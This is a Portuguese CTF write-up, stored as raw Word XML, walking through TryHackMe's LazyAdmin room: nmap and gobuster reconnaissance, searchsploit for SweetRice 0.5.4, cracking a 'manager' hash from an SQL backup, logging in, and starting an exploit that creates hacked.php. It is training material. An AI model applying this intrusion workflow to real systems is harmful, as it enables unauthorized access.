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F961F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274ED5D7" w14:textId="77777777" w:rsidR="000955F8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FA5F557" wp14:editId="5CC1E232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E63E3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23FAB995" w14:textId="77777777" w:rsidR="000955F8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64AE52DB" w14:textId="06E5DFAA" w:rsidR="000955F8" w:rsidRDefault="00B52315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Lazy Admin – TryHackMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD9193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0955F8" w14:paraId="78378ED9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33B66B1A" w14:textId="77777777" w:rsidR="000955F8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0955F8" w14:paraId="5DAED141" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="067002D6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122983B7" w14:textId="0C957717" w:rsidR="000955F8" w:rsidRDefault="00B5231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LazyAdmin – Eike G. Barbosa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000955F8" w14:paraId="77172D8E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="169E9949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D6B43DC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160137" w14:paraId="514C2C20" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F3B8A3C" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP="0016013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A32FE22" w14:textId="4A8DB29E" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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</w:tr>
      <w:tr w:rsidR="000955F8" w14:paraId="01F52BEA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7245B64B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76F3FF2" w14:textId="49A74863" w:rsidR="000955F8" w:rsidRDefault="00B52315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B52315">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://tryhackme.com/r/room/lazyadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A2735F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0955F8" w14:paraId="4911C198" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3430C24E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D9AFD0E" w14:textId="38133EEE" w:rsidR="000955F8" w:rsidRDefault="00B5231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4DEAF04E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0955F8" w14:paraId="0E08B1F8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="493CB537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3900E662" w14:textId="1CBF3C18" w:rsidR="000955F8" w:rsidRDefault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2930A8D" w14:textId="00D614B2" w:rsidR="000955F8" w:rsidRDefault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Conselheiro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000955F8" w14:paraId="767710DB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EA03C8C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43FD5AC" w14:textId="2B6FAE09" w:rsidR="000955F8" w:rsidRDefault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FF50969" w14:textId="4309FC5C" w:rsidR="000955F8" w:rsidRDefault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Conselheiro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50CE8A62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0955F8" w14:paraId="6F2D57F6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1E9FAFF0" w14:textId="77777777" w:rsidR="000955F8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0955F8" w14:paraId="1720C0E6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39946709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0D41A90D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2AFF16F7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160137" w14:paraId="6E13CF87" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E94EFC0" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP="0016013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12BE7B6F" w14:textId="604D6439" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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30/10/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30920D45" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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160137" w14:paraId="32174F00" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="428"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="090D687B" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP="0016013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626DE2AA" w14:textId="016B0F8B" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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2C9D8580" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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160137" w14:paraId="560226CE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="433E8220" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP="0016013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012D845" w14:textId="4AC61E31" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP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7DFFB650" w14:textId="77777777" w:rsidR="00160137" w:rsidRDefault="00160137" w:rsidP="0016013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2B977D89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6DB7BC4B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3CBF8D0C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sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="2112393729"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0066F0B2" w14:textId="147DF389" w:rsidR="000D0403" w:rsidRDefault="000D0403">
          <w:pPr>
            <w:pStyle w:val="CabealhodoSumrio"/>
          </w:pPr>
          <w:r>
            <w:t>Sumário</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2DE99247" w14:textId="6D36E4B9" w:rsidR="000D0403" w:rsidRDefault="000D04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330561" w:history="1">
            <w:r w:rsidRPr="00D6483A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D78F1" w14:textId="63836CA7" w:rsidR="000D0403" w:rsidRDefault="000D04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562" w:history="1">
            <w:r w:rsidRPr="00D6483A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US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5BCDF" w14:textId="5727D534" w:rsidR="000D0403" w:rsidRDefault="000D04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563" w:history="1">
            <w:r w:rsidRPr="00D6483A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B92A7" w14:textId="457BD21A" w:rsidR="000D0403" w:rsidRDefault="000D040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330564" w:history="1">
            <w:r w:rsidRPr="00D6483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_Toc210330564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C831B" w14:textId="3A3814AD" w:rsidR="000D0403" w:rsidRDefault="000D0403">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5E7A28A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F769F95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4D4D5D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41C9A96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8631B2C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6D16470A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AB0459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76A8E8B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3DEB386C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3E05D7B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16EEDC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7A4F10B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7DBFEF3C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4749D27F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761D3C2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A99CB8E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922FEB2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E91D306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B595749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1D7657A6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77ED5C1D" w14:textId="77777777" w:rsidR="000955F8" w:rsidRPr="000D0403" w:rsidRDefault="00000000" w:rsidP="000D0403">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc210330561"/>
      <w:r w:rsidRPr="000D0403">
        <w:lastRenderedPageBreak/>
        <w:t>Contextualização</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="30F24C74" w14:textId="77777777" w:rsidR="00714D1F" w:rsidRDefault="00714D1F" w:rsidP="000D04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14D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O CTF "LazyAdmin" da TryHackMe desafia os participantes a explorar vulnerabilidades comuns em sistemas web, começando com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reconhecimento</w:t>
      </w:r>
      <w:r w:rsidRPr="00714D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e varredura de portas para identificar pontos de entrada. O foco inicial é acessar uma interface administrativa web, muitas vezes configurada com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credenciais fracas</w:t>
      </w:r>
      <w:r w:rsidRPr="00714D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A exploração envolve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enumeração</w:t>
      </w:r>
      <w:r w:rsidRPr="00714D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para encontrar diretórios ou arquivos ocultos e analisar configurações inadequadas. Após obter acesso, os jogadores podem realizar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escalada de privilégios</w:t>
      </w:r>
      <w:r w:rsidRPr="00714D1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> aproveitando permissões ou scripts mal configurados. O objetivo é coletar "flags" ao longo do desafio, reforçando habilidades em exploração e defesa de sistemas web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435C1C7" w14:textId="77777777" w:rsidR="00714D1F" w:rsidRDefault="00714D1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305953B" w14:textId="3B11B24F" w:rsidR="000955F8" w:rsidRPr="000D0403" w:rsidRDefault="00000000" w:rsidP="000D0403">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc210330562"/>
      <w:r w:rsidRPr="000D0403">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Desenvolvimento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="28CFECE6" w14:textId="77777777" w:rsidR="00B52315" w:rsidRPr="000D0403" w:rsidRDefault="00B52315" w:rsidP="00B52315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0D0403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 flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F578A81" w14:textId="305B64B7" w:rsidR="000955F8" w:rsidRDefault="00B5231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Começando com um simples scan, usando o NMAP, </w:t>
      </w:r>
      <w:r w:rsidR="004A57F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> podemos observar que há 2 portas abertas, uma com serviço HTTP (80) e a outra com o serviço SSH (22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310335B4" w14:textId="42112034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nmap -sS -sV &lt;IP_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C451158" w14:textId="53FD2CED" w:rsidR="00B52315" w:rsidRDefault="00B52315">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5231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67313C1" wp14:editId="3D4F5EE7">
            <wp:extent cx="5400040" cy="1893570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4744159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15977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6138" w14:textId="77777777" w:rsidR="00B52315" w:rsidRDefault="00B52315">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8802D7" w14:textId="49343376" w:rsidR="00B52315" w:rsidRDefault="00B5231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Analisando primeira a porta HTTP, aonde está rodando um servidor Apache, não achamos nada de importante, apenas a página padrão do Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF6555" w14:textId="5D6A319D" w:rsidR="00B52315" w:rsidRDefault="00B52315">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52315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DFE445A" wp14:editId="5E29B55D">
            <wp:extent cx="4876800" cy="3367997"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1763964551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64551" name="Imagem 1" descr="Interface gráfica do usuário, Text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657" cy="33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1FC7" w14:textId="77777777" w:rsidR="00287564" w:rsidRDefault="00287564">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6A8EC0" w14:textId="4C2849E8" w:rsidR="00287564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Gobuster, podemos encontrar um diretório interessante, o “/contente”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8A317" w14:textId="0D0F0150" w:rsidR="00287564" w:rsidRPr="000D0403" w:rsidRDefault="00287564">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0403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 usado:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0403">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://&lt;IP_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88CAE2" w14:textId="0784C52E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B8D2B23" wp14:editId="4252E1C0">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183209043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90432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8B47" w14:textId="77777777" w:rsidR="00287564" w:rsidRDefault="00287564">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB0A8D4" w14:textId="30061FAF" w:rsidR="00B52315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Acessando-o, achamos uma página falando sobre um CMS instalado, chamado SweetRice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5BA21" w14:textId="5C438336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50D92E0" wp14:editId="20714912">
            <wp:extent cx="5400040" cy="1704340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9404419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41904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3FE4" w14:textId="4E472500" w:rsidR="00287564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Entrando no código fonte da página, é possível encontrar a versão desse SweetRice, sendo ele 0.5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C0324" w14:textId="2F7C0782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438E16A" wp14:editId="268B7941">
            <wp:extent cx="3534268" cy="1238423"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9476248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489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F9E" w14:textId="2BD063F2" w:rsidR="00287564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 versão, podemos pesquisar algum possível exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CC9C1" w14:textId="3DC784EE" w:rsidR="006E56C3" w:rsidRDefault="006E56C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E56C3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searchsploit SweetRice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4472CBD6" w14:textId="4F317F5C" w:rsidR="006E56C3" w:rsidRDefault="00DA03B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA03B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EFC058" wp14:editId="52BA7214">
            <wp:extent cx="6117357" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="751526430" name="Imagem 1" descr="Interface gráfica do usuário, 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26430" name="Imagem 1" descr="Interface gráfica do usuário, Padrão do plano de fund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854" cy="138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8E12" w14:textId="77777777" w:rsidR="006E56C3" w:rsidRDefault="006E56C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1948190F" w14:textId="6DFD0E5D" w:rsidR="00287564" w:rsidRDefault="006E56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Escolhendo o </w:t>
      </w:r>
      <w:r w:rsidR="00DA03B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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°, podemos analisá-lo.</w:t>
      </w:r>
      <w:r w:rsidR="0027761A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> É possível notar, que precisamos editar </w:t>
      </w:r>
      <w:r w:rsidR="00DA03B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a url da máquina alvo</w:t>
      </w:r>
      <w:r w:rsidR="0027761A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, mudando o localhost, e o path até o SweetRice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A007B83" w14:textId="51FE2D74" w:rsidR="006E56C3" w:rsidRDefault="006E56C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E56C3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searchsploit -x </w:t>
      </w:r>
      <w:r w:rsidRPr="006E56C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php/webapps/40</w:t>
      </w:r>
      <w:r w:rsidR="00DA03B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>718</w:t>
      </w:r>
      <w:r w:rsidRPr="006E56C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1143A" w14:textId="74456114" w:rsidR="0027761A" w:rsidRDefault="00DA03B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA03B8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F380037" wp14:editId="094F4437">
            <wp:extent cx="4472940" cy="2324309"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8275751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7516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9811" cy="23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9033" w14:textId="77777777" w:rsidR="00DA03B8" w:rsidRDefault="00DA03B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74646FFA" w14:textId="4C28B9D6" w:rsidR="00E35563" w:rsidRDefault="00DA03B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Achamos um arquivo em SQL. Precisamos baixá-lo e analisá-lo, para ver se conseguimos achar algum usuário no banco de dados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C152113" w14:textId="0268379A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329B814" wp14:editId="27E4B05B">
            <wp:extent cx="5400040" cy="4064000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="784741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41868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C0F" w14:textId="77777777" w:rsidR="00E35563" w:rsidRDefault="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F6361E" w14:textId="724E85C3" w:rsidR="00E35563" w:rsidRDefault="00E355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Procurando no arquivo, é possível achar uma hash ao lado do usuário “manager” (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35563">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>42f749ade7f9e195bf475f37a44cafcb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Acessando o crackstation, conseguimos decodificar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E63FA" w14:textId="4949E2CE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28EC809" wp14:editId="0428EE74">
            <wp:extent cx="5400040" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="155192050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20508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A732" w14:textId="41A19548" w:rsidR="00E35563" w:rsidRDefault="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7279F09A" w14:textId="43ACD0D5" w:rsidR="00E35563" w:rsidRDefault="00E355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voltando para o searchsploit, pegamos a 7° opção, baixamos, e mudamos novamente a URL, para poder acessar a página de login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546B481" w14:textId="27232168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9C5601C" wp14:editId="39D2567B">
            <wp:extent cx="5400040" cy="2225040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5910580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5808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6F3B" w14:textId="24F8CB6A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7A057AE" wp14:editId="4F7B7B14">
            <wp:extent cx="5400040" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="7638829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82940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6188" w14:textId="77777777" w:rsidR="00E35563" w:rsidRDefault="00E35563">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B86147E" w14:textId="59FCC892" w:rsidR="00E35563" w:rsidRDefault="00E355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Somos redirecionados para a tela de login, e então só acessar. (User: manager, pass: Password123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E919784" w14:textId="2898AB98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3FBBA38" wp14:editId="26C7CE15">
            <wp:extent cx="5400040" cy="1883410"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="20967991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9115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054F" w14:textId="7176855F" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F11C85A" w14:textId="4A9B0CA2" w:rsidR="00720FEC" w:rsidRDefault="00720F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que temos acesso, podemos voltar no arquivo do exploit e ver que precisamos criar uma página chamado hacked.php. Para fazer isso, acessamos a URL que ele pede, porém, vai dar erro, apenas reinicie o Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC26407" w14:textId="7E81D939" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720FEC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Firefox &lt;filename.html&gt; &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B374FF2" w14:textId="2F2B2398" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720FE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5015789" wp14:editId="4AABAA8C">
            <wp:extent cx="5400040" cy="1294765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="16144704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70457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4D2D" w14:textId="77777777" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF1A4AC" w14:textId="784E1AE2" w:rsidR="00720FEC" w:rsidRDefault="00720F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Acesse novamente a URL do exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F3E4F6" w14:textId="6A610E39" w:rsidR="00720FEC" w:rsidRDefault="00720FEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720FE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B850A" wp14:editId="25EFCF98">
            <wp:extent cx="5400040" cy="2259330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
